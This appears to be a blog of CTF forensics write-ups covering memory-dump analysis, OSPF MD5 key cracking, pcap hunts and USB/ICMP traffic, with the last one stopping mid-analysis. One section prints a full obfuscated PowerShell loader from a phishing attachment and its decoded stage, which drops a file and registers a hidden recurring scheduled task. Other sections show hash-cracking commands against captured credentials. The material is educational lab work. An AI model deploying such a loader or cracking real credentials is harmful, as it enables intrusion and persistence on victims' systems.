Forensics
Challenges
Secret Password Stash
I've created the best system for storing all my top-secret information. Hackers can't steal my secrets if I store them in a virtual machine, right? Unfortunately, I accidentally deleted the virtual machine. Oops! Luckily, I saved a memory capture. Can you help me recover my lost passwords?
The flag will be in format - uCTF{flag}
The first thing I had to do was extract the archive with 7z x memory.7z
, which blew up from 270MB to a gigabyte. Then since this is memory, my first thought was to spin up Volatility3, but I decided to go through some initial triage steps before jumping in:
-
strings -e l memory.dmp > secret_password_stash_strings.log
A pre-Volatility step, always a good one to take to get a fair idea of what the data you're working with contains before doing a deep dive. Looking at the logs, one thing that caught my attention and appeared multiple times is
C:\Users\admin\Desktop\note_to_self.txt
. One of the times, on line 527,696, it appeared next to a Password Safe.lnk, which might mean that there is an Alternate Data Stream at play.Continuing to parse through, we can see one of the occurrences by
\Device\HarddiskVolume2\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\super_secret_passwords.psafe3.lnk
. Eventually we find the true path for this asC:\Users\admin\Documents\My Safes\super_secret_passwords.psafe3
, and a backup atC:\Users\admin\Documents\My Safes\super_secret_passwords_001.ibak
.I think we have enough information to have a good idea of where to start looking with Volatility.
-
./vol.py -f memory.dmp windows.filescan | grep passwords
When I ran the plain
filescan
command, there were a TON of results, so I decided to filter it down to the files that we know we are interested in. We got the file offsets from this:0x3e1745d0 100.0\Users\admin\Documents\My Safes\super_secret_passwords.psafe3 216 0x3fc36070 \Users\admin\Documents\My Safes\super_secret_passwords.plk 216 0x3fe1d8f0 \Users\admin\Documents\My Safes\super_secret_passwords_001.ib 216
And we can also go ahead and get the offset for the
note_to_self.txt
file with the same technique while we're at it:0x3e054f20 100.0\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\note_to_self.lnk 216 0x3fc6c180 \Users\admin\Desktop\note_to_self.txt 216
-
./vol.py -f memory.dmp -o ./dumped_files windows.dumpfiles.DumpFiles --physaddr 0x3e1745d0
Also ran it with offset
0x3fc6c180
to get the note and0x3fc36070
in case the.psafe3
wasn't the only useful file. The note to self just had the textthequickbrownfoxjumpedoverthelazydog
, which is typically used for testing a font since it has all the letters of the alphabet in it. The.psafe3
file looks like gibberish, so we know it's either corrupted or encrypted, and that the string in the note may be the password we're looking for.
I grabbed the relevant software from Password Safe, opened the .psafe3
file, and entered the password, and we got the flag!
Answer: uCTF{Suppa_secret_pa$$word}
Crack my OSPF
You’ve been tasked with auditing the network at Big Corporation. We need you to obtain the OSPF authentication key being used by the router with the router ID of 172.31.2.56
The flag is simply the cleartext key
If the download here doesn't work (it's a BIG file for CTFd), you can download from http://files.dataspot.space/all.7z
First step is extracting the all.7z
file, which gives us a 950MB all.pcap
file. Goodie goodie!
The first thing I tried to do was use ip.addr == 172.31.2.56
as a filter to ensure we were only looking at relevant packets, but there were no hits. Next I used ospf
as a filter, and that one had more luck. To filter down to the IP of interest, we can use ospf.srcrouter == 172.31.2.56
.
I then followed the instructions for OSPFMD5Crack, which were:
-
Export the filtered traffic to a .pcap file
-
ettercap -Tqr ./all/ospf.pcap > raw-hashes.txt
Be sure to have the PCAP file saved as a
.pcap
, because the Ettercap tool doesn't work with the.pcapng
file format. -
cat raw-hashes.txt | cut -d ":" -f 2 >> net-md5-hashes.txt
-
john net-md5-hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
You may need to do
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
if you are on a new Kali instance and haven't extracted the Rockyou wordlist yet. To show the passwords a second time, dojohn --show net-md5-hashes.txt
.
Answer: missingyou
Stolen Flights
No story to this one...just need the password for "Tom Fedder"
The first thing I did upon opening the PCAP was search for frame contains "Tom"
and frame contains "Fedder"
, neither of which had any hits. Next I filtered to http
and saw a lot of good traffic, so my guess is that's the protocol of interest in this challenge.
The first interesting HTTP traffic was in packet 783, because it was to https://boardreader.com/
. Before going any filter, the OSCP traffic was just noise that I am not interested in, so I changed the active filter to http and not ocsp
to further narrow down the search space. I did the same thing by expanding even more to http and not ocsp and not http.host contains "ocsp"
to remove additional OCSP traffic from the results.
I decided to start looking at the cookies in the Baidu traffic, but initially wasn't able to make any sense of the cookie pairs. But there is a file called every_cookie_4644b13.js
in packet 50,752 that looks like it might be able to explain it to us, so I went ahead and exported the file and made it pretty. After formatting and giving it a thorough read, I didn't see anything that was going to get us useful information out of the cookie pairs, so I moved on.
Trying frame contains "pass"
in case there were any "password" or "passwd" strings didn't tield anything super interesting, except possibly tcp.stream eq 633
. Following the HTTP stream shows a good bit of data transfer, most of it appearing to be related to Baidu's website.
I tried filtering down to http.cookie
to only look at the traffic that would potentially have authentication-related information...
It's In There Somewhere...
This one is layered like that cake at Cheesecake Factory....
the flag will be in the format: HTB{flag}
The first thing I noticed is that this challenge looks exactly like one I worked on this past weekend in the HTB Business CTF! Unfortunately I didn't get around to solving the final stint of that challenge... but I did find a write-up that went over the last bit of methodology for it!
These are the steps I took to solve this challenge:
-
Open the
.eml
file in Outlook and save the attachment -
Open the attachment and a
.zip
file will automatically download -
Extract the JavaScript file from the
.zip
archive -
Run the JavaScript and print the value of the variable
hfhwsgmb
after the linehfhwsgmb = uwetjyhi.replace(/[sV]/g,'')
-
Paste the result in CyberChef and decode it as hex
-
Scroll down to the definition of
ynvjonvw
and addconsole.log(ynvjonvw)
right after, then run the code in console -
Get the PowerShell command from the variable:
PoweRShElL -EXEcU byPAss 'IEx(NEW-oBJeCT SYsTeM.iO.COmpResSion.dEfLaTestReAm( [SySTem.IO.meMOrYStReAm] [convert]::FromBase64String(''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''),[SyStEM.IO.COMPreSSION.cOMPRessIONmodE]::DECOMPReSS)| FOrEach{NEW-oBJeCT iO.sTReAMREaDEr( $_,[SYsTeM.TExt.eNcodiNg]::AsCii ) } ).reaDTOEnd( )'
-
Decode the PowerShell with the following:
$base64data = "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" $data = [System.Convert]::FromBase64String($base64data) $ms = New-Object System.IO.MemoryStream $ms.Write($data, 0, $data.Length) $ms.Seek(0,0) | Out-Null $sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress)) while ($line = $sr.ReadLine()) { $line }
-
Decode the result of the command by printing the value of the variable
EUMLmXNYuGSWAb
:SET-ItEM ("VAr"+"Ia"+"B"+"le:4z0") ([TypE]("{2}{3}{1}{0}" -f'odinG','.enC','sYSTEm.T','ext') ) ; sv IgF ( [TypE]("{1}{0}{2}{3}" -f'OnVe','SYsTEM.c','r','T') ) ;sV ('5EV'+'lS') ([type]("{1}{2}{0}" -F 'E','Io','.fIL')) ; &("{4}{1}{3}{0}{2}"-f 'ri','et-','ctMode','St','S') -Version 2 function UYc`xq (${TN`me},${Chk`go`Iul}) { for (${eum`lMx`NyUg} = 0; ${eu`mL`MxNYug} -lt ${T`NME}."c`OUnt"; ${Eu`MLMx`NyUG}++) { ${T`NME}[${eUM`lM`XnyuG}] = (${t`NmE}[${eUm`Lmx`N`yuG}] -bxor ${c`HKGo`iUl}) } return ( gEt-vaRIAble ("4"+"Z0") -VaL)::"As`Cii"."gETs`T`RIng"(${tN`Me}) } function Rc`DAt`CaJT {return (1..16 | .('%'){ '{0:X}' -f (&("{0}{2}{1}" -f 'Ge','andom','t-R') -Max 16) }) -join ''} ${E`UM`lm`XNy`UGzzOO} = (&("{0}{1}" -f 'UyC','xq') ([System.Byte[]] @(0x0a,0x16,0x16,0x12,0x58,0x4d,0x4d,0x11,0x16,0x0d,0x0e,0x07,0x0c,0x12,0x0e,0x03,0x0c,0x11,0x4c,0x0a,0x16,0x00,0x4d,0x10,0x4d)) 98) ${suQ`QsIgl} = (.("{1}{0}" -f 'Cxq','Uy') ([System.Byte[]] @(0x31,0x3c,0x36)) 80) ${X`s`xnap`VE} = (&("{1}{0}"-f'xq','UyC') ([System.Byte[]] @(0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13)) 60) &('cd') ${XSx`NAp`Ve} ${cyR`YX`whqM} = (.("{1}{2}{0}" -f 't','R','cDATCAJ'))+(.("{0}{1}"-f 'UyC','xq') ([System.Byte[]] @(0x67,0x3f,0x2b,0x3a)) 73) ${N`yNG} = (.("{1}{0}" -f 'd','pw')).("{0}{1}{2}" -f 'ToStr','i','ng').Invoke() + '\' + ${cyRYXw`H`qM} ${WbwM`g`QB} = (.("{2}{1}{0}"-f 'Jt','TCA','RcDA')) + (.("{3}{1}{2}{0}" -f'Jt','AT','CA','RcD')) ${u`JRW} = $(.("{0}{1}" -f 'whoa','mi')) ${EUMLmX`NYuGS`WAb`lOEP} = (.("{1}{0}"-f'yCxq','U') ([System.Byte[]] @(0x5d,0x7d,0x45,0x3d,0x4d,0x42,0x60,0x50,0x5d,0x37,0x4e,0x74,0x67,0x4c,0x55,0x71,0x55,0x5c,0x4e,0x6a,0x60,0x53,0x35,0x68,0x66,0x6a,0x56,0x7e,0x4f,0x40,0x45,0x74,0x47,0x6a,0x4a,0x68,0x60,0x47,0x46,0x7e,0x4d,0x40,0x34,0x63,0x55,0x37,0x4e,0x68,0x5d,0x5c,0x56,0x68,0x50,0x36,0x4e,0x75,0x5e,0x53,0x4a,0x34,0x4f,0x47,0x4e,0x5c,0x51,0x36,0x4a,0x7d,0x65,0x5c,0x46,0x34,0x48,0x68,0x4a,0x6b,0x5e,0x53,0x7c,0x77,0x4d,0x6d,0x6f,0x4f,0x67,0x7d,0x31,0x57,0x60,0x53,0x30,0x63,0x4d,0x6a,0x46,0x72,0x60,0x36,0x52,0x7d,0x67,0x36,0x6c,0x68,0x66,0x43,0x73,0x71,0x5e,0x5c,0x6c,0x68,0x4d,0x47,0x35,0x68,0x61,0x43,0x52,0x6e,0x4d,0x43,0x4e,0x31,0x67,0x43,0x42,0x7e,0x67,0x7d,0x45,0x6d,0x4d,0x47,0x5d,0x63,0x5d,0x7d,0x73,0x73,0x47,0x63,0x39,0x39)) 4); ${r`ERbWtRv} = $igf::("{1}{3}{0}{2}{4}"-f 'ase64','From','Strin','B','g').Invoke(${eu`ml`MXny`UgsW`ABl`OEp}) (get-VariAbLe ('5EV'+'LS') -Va)::("{1}{2}{0}" -f'ytes','wri','teallb').Invoke(${N`ynG},${ReR`Bw`TRV}); ${as`kz`pH`UpAj} = (.("{0}{1}"-f'p','wd')).("{0}{1}{2}"-f'ToStr','in','g').Invoke() + '\' ${vQp`SBX`gyj} = (&("{3}{0}{2}{1}" -f 'cD','Jt','ATCA','R')) ${a`etR`sd`f} = (&("{2}{1}{0}" -f 'q', 'cx', 'UY') ([System.Byte[]] @(0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2)) 223) ${t`kqr`mLSfPD} = '"' + (&("{1}{0}"-f 'xq','UyC') ([System.Byte[]] @(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$eUmLmxNYuGZZoO$suqqSiGL/$vQpsbXGyj)" + '"' # Add your debugging code here, don't run the stuff below that will actually create the task! Write-Host "$aSKZpHuPaj$cyrYXWhqM" Write-Host ${t`kqr`mLSfPD} Write-Host ${a`etR`sd`f} ${eRQ`cf} = &("{1}{4}{3}{6}{2}{5}{0}"-f'TaskAction','New-S','le','e','ch','d','du') -Execute "$aSKZpHuPaj$cyrYXWhqM" -Argument ${Tk`Q`Rmls`FpD} ${tpNDJP`w`Aa} = .("{1}{2}{0}{4}{6}{3}{5}"-f'h','New-S','c','edTaskPrin','edu','cipal','l') "$UJrw" ${aIuf`d`yWasr} = .("{4}{1}{5}{2}{0}{3}" -f'igge','w-Sche','askTr','r','Ne','duledT') -Once -At (&("{0}{1}"-f 'Get-D','ate')).AddDays(1) -RepetitionInterval (&("{1}{2}{0}" -f'pan','New-Time','S') -Days 1) -RepetitionDuration (.("{1}{2}{3}{0}"-f'n','New-Ti','meS','pa') -Days(365)) ${d`wtTAWqx} = .("{5}{4}{0}{6}{1}{3}{2}" -f 'ledT','skS','ttingsSet','e','w-Schedu','Ne','a') -Hidden -MultipleInstances ("{0}{2}{1}" -f'Par','el','all') -AllowStartIfOnBatteries .("{2}{1}{3}{4}{6}{0}{5}"-f 'T','egis','R','ter-','Sche','ask','duled') -TaskName ${WbWm`g`Qb} -Action ${Er`qcf} -Trigger ${AI`Uf`dY`WASr} -Settings ${dW`TTAWqx}
Answer: HTB{l0ts_of_l4Y3rs_iN_th4t_1}
; 500 points
Deep Six
Another one with really no story behind it....just find the flag.
Flag will be in the format: CCT{flag}
When opening the PCAP, the first odd thing I notice is that the data protocol is USB, which I haven't had to work with before. So I Googled how to work with it and found these tips for how to get started.
My first step was to git clone https://github.com/carlospolop-forks/ctf-usb-keyboard-parser
to my tools directory, then I attempted to extract the keystrokes from the PCAP via tshark
:
tshark -r ./pcap1_v2.pcapng -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata > usb-hex-commands.txt
Unfortunately for us, the output was blank! I tried converting our .pcapng
to a .pcap
and trying again, but no dice. I looked at the suggestions in this article and he said to skim the raw data, so I did that with the final large packet, and was able to see something right off the bat:
I tried looking for keystrokes with usb.transfer_type == 0x01
as suggested here, but there were no hits, so something else is going on here. In case it was easier than I was making it, I searched for frame contains "CCT"
, but unfortunatly there were no hits.
One idea is to use usbrply to attempt to convert the binary data into Python commands, so I gave it a shot:
git clone https://github.com/JohnDMcMaster/usbrply.git
cd usbrply
sudo python setup.py install
usbrply --wrapper --device-hi -p pcap1_v2.pcapng > replay.py
But unfortunately it errored out with Exception: Failed to guess vid/pid: found 0 device entries
. I made an issue on GitHub here to at least bring it to the author's attention, but I'm moving forwards without it.
Next I dug into what URB_BULK actually means, and it turns out it's file transfer data. So I tried the following tshark
command to get all the data transferred in:
tshark -r pcap1_v2.pcapng -Y 'usb.capdata and usb.endpoint_address.direction == 1' -T fields -e usb.capdata | tr -d '\n' > rawdata
Because I saw something similar used here, and we got access to the raw data! The next step is converting our hex data to binary:
sudo apt install xxd
xxd -r -p rawdata binarydata.bin
And we got the output, but it was mostly gibberish aside from a few mentions of pcap_chal.pcap
again. I decided to give binwalk a go to see if we can carve out any files:
sudo binwalk -Me binarydata.bin --run-as=root
And it worked!
Inside the PCAP, I was able to extract an image from fotoforensics.com
:
I tried uploading the image on FotoForensics to see if there was anything hidden in there, but the upload-file.php file was down or I was banned or something. I tried steghide extract -sf ./_binarydata.bin-0.extracted/fotoforensics.png
to see if there was something embedded, but steghide doesn't work with .png
images.
I tried doing a second binwalk on the PNG image with the following:
sudo binwalk -Me ./_binarydata.bin-0.extracted/fotoforensics.png --run-as=root
And it pulled out a 101KB .zlib
file, which is usually indicative of a false positive. I tried to extract it anyways, just in case:
sudo apt install pigz
unpigz ./_binarydata.bin-0.extracted/_fotoforensics.png-0.extracted/3E.zlib
But no such luck. I reached out to one of the challenge creators to see if I was on the right track, but they told me the image was a red herring and that there was other traffic of interest in the PCAP that I should direct my attention to.
I decided to start clicking through all the TCP streams to see if there was anything noteworthy in them, to try to reduce the search space.
I did notice a lot of "Application Data" being transferred via the TLSv1.3 protocol (especially in stream 31), but since it's all encrypted, I don't think there's anything we can do with it.
TCP stream 52 had a password being passed in cleartext via IRC:
:irc.cct NOTICE Auth :*** Looking up your hostname...
CAP LS 302
PASS RedRoverRedRover$$
NICK zoobah
USER binaryphalanx 2 * :binaryphalanx
:irc.cct NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.55.64) instead.
:irc.cct NOTICE Auth :Welcome to .Localnet.!
:irc.cct 001 zoobah :Welcome to the Localnet IRC Network zoobah!binaryphala@192.168.55.64
:irc.cct 002 zoobah :Your host is irc.cct, running version InspIRCd-2.0
:irc.cct 003 zoobah :This server was created on Debian
:irc.cct 004 zoobah irc.cct InspIRCd-2.0 iosw biklmnopstv bklov
:irc.cct 005 zoobah AWAYLEN=200 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANNELLEN=64 CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=255 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 :are supported by this server
:irc.cct 005 zoobah MAXTARGETS=20 MODES=20 NETWORK=Localnet NICKLEN=32 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=307 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:irc.cct 042 zoobah 108AAAAAC :your unique ID
:irc.cct 375 zoobah :irc.cct message of the day
:irc.cct 372 zoobah :- Welcome to the CCT Test Server for the PCAP assessment!
:irc.cct 376 zoobah :End of message of the day.
:irc.cct 251 zoobah :There are 1 users and 0 invisible on 1 servers
:irc.cct 254 zoobah 0 :channels formed
:irc.cct 255 zoobah :I have 1 clients and 0 servers
:irc.cct 265 zoobah :Current Local Users: 1 Max: 1
:irc.cct 266 zoobah :Current Global Users: 1 Max: 1
This also just so happened to be the only packet that showed up when I filtered on frame contains "CCT"
. I tried submitting both CCT{binaryphalanx}
and CCT{RedRoverRedRover$$}
as flags, but neither was correct.
I did a little OSINT and determined that Zoobah is likely the username of the person who created the challenge. Unfortunately, searching for "zoobah" + RedRoverRedRover
didn't yield any results. We were able to determine that the challenge was pulled from this TryHackMe room, and from there could look up some additional strategies for solving the challenge.
The hint I found was something I had considered looking in to earlier, but had forgotten about. Most standard ICMP traffic follows a similar format, so anything that doesn't would be considered anomalous. So I wrote an ICMP filter to ignore the boilerplate packets and only show the ones that were anomalous:
icmp and !(data.data contains 101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637)
We can pivot off of the information we found and extract the content of the ICMP packets via tshark
:
tshark -r pcap_chal.pcap -Y "icmp and icmp.ident == 31337" -T fields -e data.data
But upon doing this, all the data is in hexadecimal format. So we can pipe the output to xxd
to convert it to ASCII:
$ tshark -r pcap_chal.pcap -Y "icmp and icmp.ident == 31337" -T fields -e data.data | xxd -r -p
bro, what you up to?n2mhwhy?you didn't send that thing yetoh... well, not over thisif not this, then what?let's use cryptcat insteadanother thing to install?man... no one can see thisstill... rather use encryptionwe need to pick a key to useI know just the oneAngela Bennett uses it to log into the Bethesda Naval HospitalWhat? Oh, that old thing?Hang on, lemme look it upokay, I found it. use the metasploit port to receivelistener is up. send it.okay, it's sent7181f4d45de00ae35b6cf8201c8d852bhash is good
The information from this convo that we care about is the hash 7181f4d45de00ae35b6cf8201c8d852b
, which we can run through Name That Hash to confirm that it's an MD5, or raw-md5
in John. We can try to crack it with john
:
echo 7181f4d45de00ae35b6cf8201c8d852b > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=raw-md5
But there were no results, indicating that this likely isn't a password, or at least not a common one. We also know that they said they would be using the Metasploit port to receive, which is port 4444. So we can filter the traffic down to just that port and see if there's anything interesting:
tcp.port == 4444
Applying the data.data
as a column makes the data easier to visualize. When we do that, we can see that the data is coming from the remote IP 192.168.55.187
, so we can apply that as a filter as well to further narrow down the data we're looking at. All the data can be extracted via tshark
:
tshark -r pcap_chal.pcap -Y '(tcp.port == 4444 && ip.src == 192.168.55.187)' -T fields -e data.data
And we can pipe the output to xxd
to convert it to ASCII:
tshark -r pcap_chal.pcap -Y '(tcp.port == 4444 && ip.src == 192.168.55.187)' -T fields -e data.data | xxd -r -p > payload.bin
